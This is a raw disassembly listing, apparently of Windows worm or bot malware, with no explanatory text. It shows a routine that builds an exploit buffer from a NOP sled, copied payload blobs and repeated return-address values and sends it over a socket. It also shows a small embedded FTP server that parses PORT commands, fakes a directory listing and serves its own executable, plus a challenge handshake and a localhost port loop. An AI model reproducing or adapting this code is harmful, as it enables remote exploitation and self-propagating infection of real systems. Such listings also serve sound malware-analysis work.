; ---------------------------------------------------------------------------
loc_410C6F: ; CODE XREF: sub_410B52+116�j
movsx eax, [ebp+var_7CC]
sub eax, 30h
mov [ebp+var_208], al
movsx eax, [ebp+var_7C8]
sub eax, 30h
mov [ebp+var_4], al
push 3Eh
push offset dword_41B168
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410CC9
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410CC9: ; CODE XREF: sub_410B52+170�j
push 60h
push offset dword_41B1A8
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D06
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D06: ; CODE XREF: sub_410B52+1AD�j
push 0A0h
push offset dword_41B20C
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D46
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D46: ; CODE XREF: sub_410B52+1ED�j
movsx eax, [ebp+var_208]
cmp eax, 5
jnz loc_410E71
movsx eax, [ebp+var_4]
cmp eax, 1
jnz loc_410E71
push 86h
push offset dword_41B2B0
lea eax, [ebp+var_B78]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_20C]
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_AF2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0
mov eax, 264h
sub eax, [ebp+var_20C]
add eax, 60h
push eax
mov eax, [ebp+var_20C]
lea eax, [ebp+eax+var_AF2]
push eax
call sub_410F60
add esp, 0Ch
push 4
push offset dword_41B410
lea eax, [ebp+var_88E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_882]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_85E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_852]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 20h
push offset dword_41B338
lea eax, [ebp+var_82E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 36Ah
lea eax, [ebp+var_B78]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 400h
call dword_41709C ; Sleep
push 36Ah
lea eax, [ebp+var_B78]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410E71: ; CODE XREF: sub_410B52+1FE�j
; sub_410B52+20B�j
movsx eax, [ebp+var_208]
cmp eax, 5
jnz short loc_410E85
movsx eax, [ebp+var_4]
test eax, eax
jz short loc_410E95
loc_410E85: ; CODE XREF: sub_410B52+329�j
movsx eax, [ebp+var_208]
cmp eax, 4
jnz locret_410F5E
loc_410E95: ; CODE XREF: sub_410B52+331�j
push 86h
push offset dword_41B35C
lea eax, [ebp+var_104C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E8h
sub eax, [ebp+var_20C]
push eax
push 90h
lea eax, [ebp+var_FC6]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push [ebp+var_20C]
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_BDE]
sub eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
and [ebp+var_B7C], 0
jmp short loc_410F06
; ---------------------------------------------------------------------------
loc_410EF9: ; CODE XREF: sub_410B52+3DA�j
mov eax, [ebp+var_B7C]
inc eax
mov [ebp+var_B7C], eax
loc_410F06: ; CODE XREF: sub_410B52+3A5�j
cmp [ebp+var_B7C], 10h
jge short loc_410F2E
push 4
push offset dword_41B408
mov eax, [ebp+var_B7C]
lea eax, [ebp+eax*4+var_BDE]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_410EF9
; ---------------------------------------------------------------------------
loc_410F2E: ; CODE XREF: sub_410B52+3BB�j
push 20h
push offset dword_41B3E4
lea eax, [ebp+var_B9E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4CEh
lea eax, [ebp+var_104C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
locret_410F5E: ; CODE XREF: sub_410B52+58�j
; sub_410B52+98�j ...
leave
retn
sub_410B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F60 proc near ; CODE XREF: sub_410B52+265�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_8], 0
jnz short loc_410FA4
and [ebp+var_4], 0
jmp short loc_410F79
; ---------------------------------------------------------------------------
loc_410F72: ; CODE XREF: sub_410F60+3D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410F79: ; CODE XREF: sub_410F60+10�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_410F9F
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov al, byte_41BB00[eax]
mov [ecx], al
jmp short loc_410F72
; ---------------------------------------------------------------------------
loc_410F9F: ; CODE XREF: sub_410F60+1F�j
jmp locret_41102D
; ---------------------------------------------------------------------------
loc_410FA4: ; CODE XREF: sub_410F60+A�j
cmp [ebp+arg_8], 7Fh
jnz short loc_410FDF
and [ebp+var_8], 0
jmp short loc_410FB7
; ---------------------------------------------------------------------------
loc_410FB0: ; CODE XREF: sub_410F60+7B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_410FB7: ; CODE XREF: sub_410F60+4E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jnb short loc_410FDD
push 5
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov al, byte_41BB00[eax]
mov [ecx], al
jmp short loc_410FB0
; ---------------------------------------------------------------------------
loc_410FDD: ; CODE XREF: sub_410F60+5D�j
jmp short locret_41102D
; ---------------------------------------------------------------------------
loc_410FDF: ; CODE XREF: sub_410F60+48�j
and [ebp+var_C], 0
loc_410FE3: ; CODE XREF: sub_410F60+AD�j
; sub_410F60+CB�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnb short locret_41102D
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_10], al
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_8]
and ecx, dword_41BB01[eax]
test ecx, ecx
jz short loc_41100F
jmp short loc_410FE3
; ---------------------------------------------------------------------------
loc_41100F: ; CODE XREF: sub_410F60+AB�j
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_C]
mov al, byte_41BB00[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_410FE3
; ---------------------------------------------------------------------------
locret_41102D: ; CODE XREF: sub_410F60:loc_410F9F�j
; sub_410F60:loc_410FDD�j ...
leave
retn
sub_410F60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41102F proc near ; CODE XREF: sub_41113B+79B�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
push 0EA60h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4050EA
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411065
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_41106C
loc_411065: ; CODE XREF: sub_41102F+2B�j
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41106C: ; CODE XREF: sub_41102F+34�j
push offset aRb ; "rb"
push offset dword_41EB2C
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_41109F
push [ebp+var_204]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41109F: ; CODE XREF: sub_41102F+5B�j
; sub_41102F:loc_41111C�j
mov eax, [ebp+var_208]
mov eax, [eax+0Ch]
and eax, 10h
test eax, eax
jnz short loc_41111E
push [ebp+var_208]
push 200h
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_20C], eax
push [ebp+var_20C]
lea eax, [ebp+var_200]
push eax
push [ebp+var_204]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_210], eax
mov eax, [ebp+var_20C]
cmp eax, [ebp+var_210]
jz short loc_41111C
push [ebp+var_204]
call sub_4053B1
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
xor eax, eax
jmp short locret_411139
; ---------------------------------------------------------------------------
loc_41111C: ; CODE XREF: sub_41102F+CF�j
jmp short loc_41109F
; ---------------------------------------------------------------------------
loc_41111E: ; CODE XREF: sub_41102F+7E�j
push [ebp+var_204]
call sub_40538D
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
locret_411139: ; CODE XREF: sub_41102F+38�j
; sub_41102F+6B�j ...
leave
retn
sub_41102F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41113B proc near ; DATA XREF: sub_411BBC+156�o
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_544 = dword ptr -544h
var_540 = byte ptr -540h
var_53C = byte ptr -53Ch
var_538 = byte ptr -538h
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_52C = dword ptr -52Ch
var_528 = dword ptr -528h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_318 = byte ptr -318h
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 558h
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_10C], eax
push offset dword_41C6B0
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
mov al, byte_41DE30
mov [ebp+var_104], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
mov al, byte_41DE30
mov [ebp+var_114], al
xor eax, eax
lea edi, [ebp+var_113]
stosd
stosb
and [ebp+var_4], 0
and [ebp+var_118], 0
and [ebp+var_108], 0
loc_4111CC: ; CODE XREF: sub_41113B+10C�j
; sub_41113B+1BD�j ...
push 0EA60h
push [ebp+var_10C]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jz loc_4119BA
push 200h
lea eax, [ebp+var_318]
push eax
push [ebp+var_10C]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_520], eax
cmp [ebp+var_520], 0
jz short loc_411218
cmp [ebp+var_520], 0FFFFFFFFh
jnz short loc_41121D
loc_411218: ; CODE XREF: sub_41113B+D2�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41121D: ; CODE XREF: sub_41113B+DB�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
lea eax, [ebp+var_318]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_528], eax
cmp [ebp+var_528], 0
jnz short loc_411249
jmp short loc_4111CC
; ---------------------------------------------------------------------------
loc_411249: ; CODE XREF: sub_41113B+10A�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_51C], eax
cmp [ebp+var_51C], 0
jnz short loc_411278
mov [ebp+var_51C], offset byte_41DE30
loc_411278: ; CODE XREF: sub_41113B+131�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
push [ebp+var_528]
call sub_40ED38
pop ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_524]
sub eax, dword_41C6A0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4112FD
mov [ebp+var_4], 1
push offset dword_41C698
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4112FD: ; CODE XREF: sub_41113B+178�j
mov eax, [ebp+var_524]
sub eax, dword_41C68C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41135D
mov [ebp+var_118], 1
push offset dword_41C684
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41135D: ; CODE XREF: sub_41113B+1D5�j
cmp [ebp+var_4], 0
jz short loc_41136C
cmp [ebp+var_118], 0
jnz short loc_411371
loc_41136C: ; CODE XREF: sub_41113B+226�j
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411371: ; CODE XREF: sub_41113B+22F�j
mov eax, [ebp+var_524]
sub eax, dword_41C678
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4113C7
push offset dword_41C670
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4113C7: ; CODE XREF: sub_41113B+249�j
mov eax, [ebp+var_524]
sub eax, dword_41C664
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41141D
push offset dword_41C65C
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41141D: ; CODE XREF: sub_41113B+29F�j
mov eax, [ebp+var_524]
sub eax, dword_41C654
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_411473
push offset dword_41C648
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411473: ; CODE XREF: sub_41113B+2F5�j
mov eax, [ebp+var_524]
sub eax, dword_41C63C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4114C9
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4114C9: ; CODE XREF: sub_41113B+34B�j
mov eax, [ebp+var_524]
sub eax, dword_41C628
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41151F
push offset dword_41C620
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41151F: ; CODE XREF: sub_41113B+3A1�j
mov eax, [ebp+var_524]
sub eax, dword_41C614
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411622
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_52C]
push eax
lea eax, [ebp+var_540]
push eax
lea eax, [ebp+var_53C]
push eax
lea eax, [ebp+var_538]
push eax
lea eax, [ebp+var_530]
push eax
push offset aUUUUUU ; "%u,%u,%u,%u,%u,%u"
push [ebp+var_51C]
call sub_416BA2 ; sscanf
add esp, 20h
movzx eax, [ebp+var_540]
push eax
movzx eax, [ebp+var_53C]
push eax
movzx eax, [ebp+var_538]
push eax
movzx eax, [ebp+var_530]
push eax
push offset dword_418A50
push 100h
lea eax, [ebp+var_104]
push eax
call sub_416BAE ; _snprintf
add esp, 1Ch
mov eax, [ebp+var_52C]
and eax, 0FFh
shl eax, 8
mov ecx, [ebp+var_534]
and ecx, 0FFh
or eax, ecx
push eax
push offset dword_418A60
push 6
lea eax, [ebp+var_114]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411622: ; CODE XREF: sub_41113B+3F7�j
mov eax, [ebp+var_524]
sub eax, dword_41C5F4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_4116E9
push offset aRb ; "rb"
push offset dword_41EB2C
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_548], eax
cmp [ebp+var_548], 0
jnz short loc_411660
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411660: ; CODE XREF: sub_41113B+51E�j
push 2
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_544], eax
push 0
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_544]
push offset dword_41C5E8
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4116E9: ; CODE XREF: sub_41113B+4FA�j
mov eax, [ebp+var_524]
sub eax, dword_41C5DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411873
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_54C], eax
cmp [ebp+var_54C], 0
jz short loc_411773
cmp [ebp+var_54C], 0FFFFFFFFh
jnz short loc_411778
loc_411773: ; CODE XREF: sub_41113B+62D�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411778: ; CODE XREF: sub_41113B+636�j
push offset aRb ; "rb"
push offset dword_41EB2C
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_554], eax
cmp [ebp+var_554], 0
jnz short loc_41179D
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41179D: ; CODE XREF: sub_41113B+65B�j
push 2
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_550], eax
push 0
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B82 ; fclose
pop ecx
push offset dword_41EB2C
push [ebp+var_550]
push offset aX32000Fh1024Ja ; "-x 3 2000 fh 1024 Jan 1 0:00 .\r\ndrwxr-x"...
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_54C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_54C]
call sub_40538D
pop ecx
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411873: ; CODE XREF: sub_41113B+5C1�j
mov eax, [ebp+var_524]
sub eax, dword_41C54C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411969
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_41102F
pop ecx
pop ecx
test eax, eax
jz loc_411967
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 1
push offset dword_41EB08
call sub_409C88
pop ecx
pop ecx
inc eax
mov [ebp+var_558], eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_558]
push offset aFtp_0 ; "ftp"
push offset unk_41C520
push offset dword_41DAB4
call sub_40D4AB
add esp, 14h
push 3E8h
call dword_41709C ; Sleep
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411967: ; CODE XREF: sub_41113B+7A4�j
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411969: ; CODE XREF: sub_41113B+74B�j
mov eax, [ebp+var_524]
sub eax, dword_41C514
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4119BA
push offset a221 ; "221 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
loc_4119BA: ; CODE XREF: sub_41113B+A5�j
; sub_41113B:loc_411218�j ...
push offset a231 ; "231 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_10C]
call sub_40538D
pop ecx
xor eax, eax
pop edi
leave
retn 4
sub_41113B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A09 proc near ; CODE XREF: sub_411BBC+90�p
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
push 32h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_411A29
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A29: ; CODE XREF: sub_411A09+17�j
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411A58
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411A5F
loc_411A58: ; CODE XREF: sub_411A09+44�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A5F: ; CODE XREF: sub_411A09+4D�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6D8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411A8A
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A8A: ; CODE XREF: sub_411A09+78�j
push offset dword_41C6CC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411AEE
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411AF5
loc_411AEE: ; CODE XREF: sub_411A09+DA�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411AF5: ; CODE XREF: sub_411A09+E3�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6C8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411B20
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411B20: ; CODE XREF: sub_411A09+10E�j
call sub_410422
push eax
push offset dword_41C6BC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411B8B
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411B8F
loc_411B8B: ; CODE XREF: sub_411A09+177�j
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411B8F: ; CODE XREF: sub_411A09+180�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6B8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411BB7
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411BB7: ; CODE XREF: sub_411A09+1A8�j
push 1
pop eax
locret_411BBA: ; CODE XREF: sub_411A09+1B�j
; sub_411A09+51�j ...
leave
retn
sub_411A09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411BBC proc near ; CODE XREF: sub_411D59+6�p
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_8], 1
jmp short loc_411C04
; ---------------------------------------------------------------------------
loc_411BFD: ; CODE XREF: sub_411BBC:loc_411CAB�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_411C04: ; CODE XREF: sub_411BBC+3F�j
cmp [ebp+var_8], 0FFFFh
jnb loc_411CB0
push 0Ah
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call sub_416F7A ; _itoa
add esp, 0Ch
push 0FFFFFFFFh
push 0
lea eax, [ebp+var_18]
push eax
push offset a127_0_0_1 ; "127.0.0.1"
call sub_4050EA
